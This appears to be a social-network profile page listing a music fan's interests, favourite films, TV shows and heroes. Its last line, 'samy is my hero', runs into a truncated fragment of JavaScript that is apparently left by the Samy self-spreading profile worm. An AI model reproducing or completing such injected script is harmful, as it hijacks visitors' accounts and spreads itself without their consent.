MUSIC, Friends, Grimey/Drunken nights, Bud, Beach, thinking, plotting, ladies in high heels, gangsta Biz, gangsta Ho's, Dominos, Cubilete, records, cash, nice Bars/Clubs, BASS, creating fun presents, Hot Fudge Brownie Sundaes, smoking joints in bed, Puma, Kangol, Johnie Walker, shopping for boxers - can u ever have enough?!?, laptops, ipods & all convenient portable gadgets, monkies, Love, turntables, Halo2, san andreas, geomtery proofs, champagne, Innocent smiles, Home Depot, peace, challenging scenarios, love this game we call life, SL500 BenzO', warm baths, stretching, eating healthy (half the time at least...), DESIGN, technology, having sex in unusual places, USA, K0MPUT3RZ, puzzles, down comforter, i love turning people on to new things, subway trains, sunny days, It's all interesting...
I'd like to meet:
Interested in meeting d&b music industry peeps...If u can help the cause, cool! Networking's all about meeting the right people with the same set of quality standards & makin' shit happen. I will always keep walkin' forward...& every now & then look to my sides & see who is still movin' along with me...those are the good people in life that I wanna meet. =]I'd like to meet Murphy; hoping that he can explain to me a bit more about his laws...I'd also like to meet the elephant that lives in Central Park!People in my neighborhood.. people who are willing to go to almost any length to succeed in life.. someone to go to the gym with.. compassionate & considerate people..Dave Chapelle, Johnie Walker, Ludacris, Gary Coleman, 2Pac (I know he's on some island somewhere..), David Hasselhoff, Snoop Dogg, Uncle Luke, Alyssa milano, Trick Daddy, porn stars, Dr. Dre, Hugh Heffner, & other Chilled out, productive, open minded people...
d&b, hip hop, dub, latin, miami BASS, Electro, jazz, u can't forget about freestyle, the sound of New York, hip hop battle mix-tapes, folk music from different countries, ambient & anything else in between... (althouh i tend to be picky... so much music, not enough time!)
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Blow, Half Baked, Kingpin, Human Traffic, Baraka, Casino, New Jack City, Grass, Scarface, Heathers, Rounders, Breakfast Club, Pee Wee's Big Adventure, Matrix, The Wall, Friday, Snatch, How High, Rush, Pulp Fiction, Jackie Brown, ..usually anything Blaxploitation i can find interesting to some degree, Beavis & Butthead Do America
HBO On-Demand rulez!!, sad as it seems - yes - my roomamtes & i all are glued to the tv when For Love Or For Moeny comes on..., History, Discovery & Comedy central mainly... but then again, I don't really watch too much tv. Lately I've just been buying all these old skool tv shows(TV on DVD) like Miami Vice, Ren & Stimpy, Jeffersons, Diff'rent Strokes, Flintstones etc.. :-P
Uhhh.. New Release Catalogues... does that count?!? I also like to read those 'do it yourself books...' to make me think i've learned something new. I don't read too too much, I'd rather sit on the train with headphones & watch people or look out the window...
Gospel preachers on channel 33 late at night! Mi abuelo! Calibre, el Chapulin Colorado, Aaaarnold ...=] but most of all, samy is my hero. 0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%
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